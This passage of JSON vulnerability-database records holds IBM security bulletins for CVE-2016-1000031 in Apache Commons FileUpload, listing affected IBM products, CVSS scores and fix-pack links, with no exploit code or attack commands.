"impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T15:47:24", "id": "BC4CE6FA6231522277B8CDD6EBE913273E804C9EC6F8EA56F64C54D931A5F0A3", "href": "https://www.ibm.com/support/pages/node/299701", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-22T01:47:18", "description": "## Summary\n\nIBM API Connect has addressed the following vulnerability.\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected IBM API Management | Affected Versions \n---|--- \nIBM API Connect | 5.0.0.0-5.0.8.4 \n \n## Remediation/Fixes\n\nAffected releases | Fixed in VRMF | APAR | Remediation / First Fix \n---|---|---|--- \nIBM API Connect V5.0.0.0 - 5.0.8.4 | 5.0.8.5 | LI80550 | \n\nAddressed in IBM API Connect V5.0.8.5 fixpack.\n\nFollow this link and find the APIConnect_Management package.\n\n \n[http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.8.4&platform=All&function=all&source=fc](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=5.0.8.4&platform=All&function=all&source=fc>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-01-17T17:35:01", "type": "ibm", "title": "Security Bulletin: APIC is affected by a vulnerability in Apache Commons FileUpload (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2019-01-17T17:35:01", "id": "4C85D2930346AD967159AF4455A7D0489E2962948B89964DEEB838E940D0D79F", "href": "https://www.ibm.com/support/pages/node/794179", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:53:05", "description": "## Summary\n\nThe DiskFileItem class in Apache Commons Fileupload before version 1.3.3, used in IBM WebSphere MQ File Transfer Edition, specifically the Web Gateway component, could allow remote attackers to execute arbitrary code under the context of the current process, causing an undefined behavior.\n\n## Vulnerability Details\n\n \n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, used in IBM WebSphere MQ File Transfer Edition, could allow deserialization of untrusted data in the DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM WebSphere MQ File Transfer Edition v7.0.0 \n\nIBM WebSphere MQ File Transfer Edition v7.0.1\n\nIBM WebSphere MQ File Transfer Edition v7.0.2\n\nIBM WebSphere MQ File Transfer Edition v7.0.3\n\nIBM WebSphere MQ File Transfer Edition v7.0.4\n\n## Remediation/Fixes\n\nAll affected product versions are already End of Support. Customers must contact IBM to obtain a fix for the affected release.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:08:42", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload Vulnerabilities in IBM WebSphere MQ File Transfer Edition component (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T07:08:42", "id": "172E8A857C199BCE10B08A718612B7B83ED02952ADF1DE693EE2C676DADD4B46", "href": "https://www.ibm.com/support/pages/node/301447", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:39:50", "description": "## Summary\n\nThe DiskFileItem class in Apache Commons Fileupload before 1.3.3, as used in Control Center, could allow remote attackers to execute arbitrary code under current context of the current process causing an undefined behavior.\n\n## Vulnerability Details\n\n**CVEID**: [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \nDescription: Apache Commons FileUpload, as used in Novell NetIQ Sentinel, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. A attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Control Center 6.1.1.0 through 6.1.1.0 iFix02 \nIBM Control Center 6.1.0.0 through 6.1.0.2 iFix03 \nIBM Control Center 6.0.0.0 through 6.0.0.2 iFix02\n\n## Remediation/Fixes\n\n**Product**\n\n| \n\n**VRMF**\n\n| \n\n**Remediation / First Fix** \n \n---|---|--- \nIBM Control Center | 6.0.0.2 | [_Fix Central - 6.0.0.2_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=6.0.0.2&platform=All&function=all>) iFix03 \nIBM Control Center | 6.1.0.2 | [_Fix Central - 6.1.0.2_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=6.1.0.2&platform=All&function=all>) iFix04 \nIBM Control Center | 6.1.1.0 | [_Fix Central - 6.1.1.0_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%2Bsoftware&product=ibm/Other+software/Sterling+Control+Center&release=6.1.1.0&platform=All&function=all>) iFix03 \n \n## Workarounds and Mitigations\n\nNone.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-17T22:47:42", "type": "ibm", "title": "Security Bulletin: Apache Commons FileUpload Vulnerabilities in IBM Control Center (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2019-12-17T22:47:42", "id": "8D7ED64456FC169D02750D2AA4A80B16FFC334A2DA71875B22768979B26CAC67", "href": "https://www.ibm.com/support/pages/node/572139", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:54:12", "description": "## Summary\n\nVulnerability in Apache commons-fileupload affects IBM Algo One Algo Risk Application (ARA) \nCVE-2016-1000031\n\n## Vulnerability Details\n\n \n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nIBM Algo One Algo Risk Application (ARA) v5.1, 5.0\n\n## Remediation/Fixes\n\n**Product Name**\n\n| **iFix Name**| **Remediation/First Fix** \n---|---|--- \nIBM Algo One - ARA| 5.1.0.3-2| [Fix Central Download](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+One&release=All&platform=All&function=fixId&fixids=5.1.0.3-2-Algo-One-ARA-if0346:0&includeSupersedes=0&source=fc&login=true>) \nIBM Algo One - ARA| 5.0.0.6-23| [Fix Central Download](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm~Information+Management&product=ibm/Information+Management/Algo+One&release=All&platform=All&function=fixId&fixids=5.0.0.6-23-Algo-One-ARA-if0400:0&includeSupersedes=0&source=fc&login=true>) \n \n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T23:52:11", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache commons-fileupload affects IBM Algo One Algo Risk Application (ARA) \nCVE-2016-1000031", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T23:52:11", "id": "75D402B2CEA61D69C553141E08DFD9743DA1DE8E0FE50384A99E9AD4F4E5B618", "href": "https://www.ibm.com/support/pages/node/569289", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T21:44:39", "description": "## Summary\n\nIBM OpenPages GRC Platform has addressed vulnerability in Apache Commons FileUpload (CVE-2016-1000031)\n\n## Vulnerability Details\n\n**CVEID: ** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM OpenPages GRC Platform versions 7.3 through 8.0\n\n## Remediation/Fixes\n\nA fix has been created for each affected version of the named product. Download and install the fix as soon as possible. Fixes and installation instructions are provided at the URLs listed below: \n\n\n**Product** | **VRMF** | **Remediation/First Fix** \n---|---|--- \nIBM OpenPages GRC Platform **8.0** \n| 8.0.0.2 | <https://www.ibm.com/support/docview.wss?uid=ibm10744175> \nIBM OpenPages GRC Platform **7.3.0 ** \n| 7.3.0.3 | <https://www.ibm.com/support/docview.wss?uid=ibm10794867> \n \n## Workarounds and Mitigations\n\nNone known, apply fixes.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-01T21:20:02", "type": "ibm", "title": "Security Bulletin: IBM OpenPages GRC Platform is affected by a vulnerability in Apache Commons FileUpload (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2019-02-01T21:20:02", "id": "E143583639D054AA8FE69FA00A9B2C711903F95581EE6F26FFBD1FCD98532960", "href": "https://www.ibm.com/support/pages/node/728743", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:53:12", "description": "## Summary\n\nVulnerability in Apache Commons FileUpload affects IBM WebSphere Service Registry and Repository (CVE-2016-1000031)\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>)** \nDESCRIPTION:** Apache Commons FileUpload, as used in certain products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n\n## Affected Products and Versions\n\nWebSphere Service Registry and Repository V8.5 \nWebSphere Service Registry and Repository V8.0 \n \nFor unsupported versions IBM recommends upgrading to a fixed, supported version of the product\n\n## Remediation/Fixes\n\nTo remediate CVE-2016-1000031 you need to apply fixes for both IBM WebSphere Application Server and IBM WebSphere Service Registry and Repository. \n \nFor** WebSphere Application Server** updates refer to this bulletin: \n[Security Bulletin: Security vulnerability in Apache Commons FileUpload used by WebSphere Application Server (CVE-2016-1000031)](<http://www.ibm.com/support/docview.wss?uid=swg22011428>) \n \nFor **WebSphere Service Registry and Repository**, this vulnerability has been fixed under APAR IJ01131. Fixes containing IJ01131 have been published and are available from Fix Central. \n \n**For WSRR V8.5**\n\n * Apply [**V8.5.6.1****_IJ01131**](<https://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FWebSphere+Service+Registry+and+Repository&fixids=8.5.6.1-WS-WSRR-MultiOS-IFIJ01131>)** \n**\n**For WSRR V8.0**\n\n * Apply [](<http://www.ibm.com/support/fixcentral/swg/quickorder?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+Service+Registry+and+Repository&function=fixId&fixids=8.0.0.3-WS-WSRR-MultiOS-IFIV65487_IV79085>)[**V****8.0.0.3_IV65487_IV79085_IV87422_IV87429_IV89477_IJ01131**](<https://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FWebSphere%2FWebSphere+Service+Registry+and+Repository&fixids=8.0.0.3-WS-WSRR-MultiOS-IFIV65487_IV79085_IV87422_IV87429_IV89477_IJ01131>)\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:08:22", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons FileUpload affects IBM WebSphere Service Registry and Repository (CVE-2016-1000031)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-15T07:08:22", "id": "1071929E319DA2301B42C192AD319E3B6E2E74FD95170F6C359D22224A6C2385", "href": "https://www.ibm.com/support/pages/node/299859", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:47:42", "description": "## Summary\n\nFileNet Collaboration Services has addressed the following vulnerability. \nAbility to execute remote attacker\u2019s arbitrary code on a target machine by leveraging the untrusted data in DiskFileItem class of FileUpload library\n\n## Vulnerability Details\n\n**CVEID**: [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>) \n\n\n**DESCRIPTION**: IBM FileNet Collaboration Services could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of FileUpload library. A attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. The affected \u201cCommons FileUpload\u201d version 1.3.2 has been upgraded to the fixed version v1.3.3 \n\nCVSS Base Score: 9.8 \nCVSS Temporal Score: [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nIBM Content Navigator 2.0.3.8 \n\nIBM Content Navigator 3.0\n\nIBM Content Navigator 3.0.1\n\nIBM Content Navigator 3.0.2\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nIBM Content Navigator | 2.0.3.8| Download the fix ICN 2.0.3 FP8 LA 15 from IBM Fix central ([https://www.ibm.com/support/fixcentral/](<https://www-945.ibm.com/support/fixcentral/>)) ) \nIBM Content Navigator| 3.0| Download the fix ICN 3.0 LA 12 from IBM Fix central ([https://www.ibm.com/support/fixcentral/](<https://www-945.ibm.com/support/fixcentral/>)) \nIBM Content Navigator| 3.0.1| Download the fix ICN 3.0.1 LA 05 from IBM Fix central ([https://www.ibm.com/support/fixcentral/](<https://www-945.ibm.com/support/fixcentral/>)) \nIBM Content Navigator| 3.0.2| Download the fix ICN 3.0.2 LA 02 from IBM Fix central ([https://www.ibm.com/support/fixcentral/](<https://www-945.ibm.com/support/fixcentral/>)) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-17T12:19:05", "type": "ibm", "title": "Security Bulletin: FileNet Collaboration Services is affected by the ability to execute remote attacker\u2019s arbitrary code on a target machine vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2018-06-17T12:19:05", "id": "C9E756FDC2D170A759D074368FA581B4BDE59726C48E93D77387BFF9A0BD269B", "href": "https://www.ibm.com/support/pages/node/300809", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:39:12", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Sterling Secure Proxy.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2016-1000031_](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION: **Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/117957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/117957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling Secure Proxy 3.4.3 through 3.4.3.0 iFix 5 \nIBM Sterling Secure Proxy 3.4.2 through 3.4.2.0 iFix 12\n\n## Remediation/Fixes\n\n**_Product_**\n\n| _VRMF_| _APAR_| _How to acquire fix_ \n---|---|---|--- \n_IBM Sterling Secure Proxy_| _3.4.3.0_| _IT23654_| [_Fix Central_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other+software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.3.0&platform=All&function=all>) \n_IBM Sterling Secure Proxy_| _3.4.2.0_| _IT23654_| [_Fix Central_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other+software&product=ibm/Other+software/Sterling+Secure+Proxy&release=3.4.2.0&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-12-17T22:56:50", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons FileUpload Affects IBM Sterling Secure Proxy", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-1000031"], "modified": "2019-12-17T22:56:50", "id": "4FDDAEF0B75E77A06B8D7597974820AA398F5338DCF044E51EA0222441200F4A", "href": "https://www.ibm.com/support/pages/node/302739", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-23T21:49:36", "description": "## Summary\n\nIBM Sterling Order Management uses Apache Commons FileUpload and is affected by some of the vulnerabilities that exist in Apache Commons FileUpload.\n\n## Vulnerability Details\n\n**CVEID:** [CVE-2016-1000031](<https://vulners.com/cve/CVE-2016-1000031>) \n**DESCRIPTION:** Apache Commons FileUpload, as used in Novell NetIQ Sentinel and other products, could allow a remote attacker to execute arbitrary code on the system, caused by deserialization of untrusted data in DiskFileItem class of the FileUpload library. A remote attacker could exploit this vulnerability to execute arbitrary code under the context of the current process. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/117957> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 through 10.0\n\n## Remediation/Fixes\n\nThe recommended solution is to apply the security fix pack (SFP) as soon as practical. Please see below for information about the available fixes. \n\n**_Product_**\n\n| \n\n**_Security Fix Pack*_**\n\n| \n\n_Remediation/First Fix_ \n \n---|---|--- \nIBM Sterling Selling and Fulfillment Foundation 10.0 | **_10.0-SFP1_** | [Fix Central](<http://www.ibm.com/support/fixcentral/options>) **_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.5.0\n\n| \n\n**_9.5.0-SFP4_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>) **_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.4.0\n\n| \n\n**_9.4.0-SFP5_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>) **_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.3.0\n\n| \n\n**_9.3.0-SFP7_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>) **_ \\- Select appropriate VRMF_** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.1\n\n| \n\n**_9.2.1- SFP8_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>) **_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.2.0\n\n| \n\n**_9.2.0- SFP8_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>) **_ \\- Select appropriate VRMF _** \n \nIBM Sterling Selling and Fulfillment Foundation 9.1.0\n\n| \n\n**_9.1.0- SFP8_**\n\n| \n\n[Fix Central](<http://www.ibm.com/support/fixcentral/options>) **_ \\- Select appropriate VRMF _** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 